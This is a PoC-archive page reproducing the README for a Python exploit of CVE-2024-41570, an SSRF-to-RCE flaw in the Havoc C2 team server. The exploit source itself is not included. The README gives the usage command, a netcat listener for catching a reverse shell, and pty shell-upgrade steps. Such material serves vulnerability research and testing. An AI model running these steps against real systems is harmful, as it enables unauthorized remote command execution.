PoC details: b82537a7d0a3940037eb8014c7f3e804d75b4233

Source
Related vulnerability
Title: Havoc security vulnerability (CVE-2024-41570)
Description: Havoc is a modern and extensible post-exploitation command and control framework open-sourced by Havoc Framework. Havoc 2 0.7 contains a security vulnerability caused by an unauthenticated server-side request forgery flaw in demon callback handling, which allows an attacker to send arbitrary network traffic originating from the team server.
Description
Automated Reverse Shell Exploit via WebSocket | Havoc-C2-SSRF with RCE
Introduction
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/<your-repo-name>.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Team Server from Havoc.
- `-p`: Port for the Team Server from Havoc.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade the shell:
   ```bash
   python -c 'import pty; pty.spawn("/bin/bash")'
   export TERM=xterm-256color
   stty rows 67 columns 318
   ```

## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc PoC](https://github.com/chebuya/Havoc-C2-SSRF-poc)

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.


File snapshot

```text
[4.0K] /data/pocs/b82537a7d0a3940037eb8014c7f3e804d75b4233
├── [9.2K] exploit.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [  60] requirements.txt

0 directories, 4 files
```
The Shenlong bot has cached this for you.
Notes
1. It is recommended to access the PoC through the source first.
2. If the source has expired or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.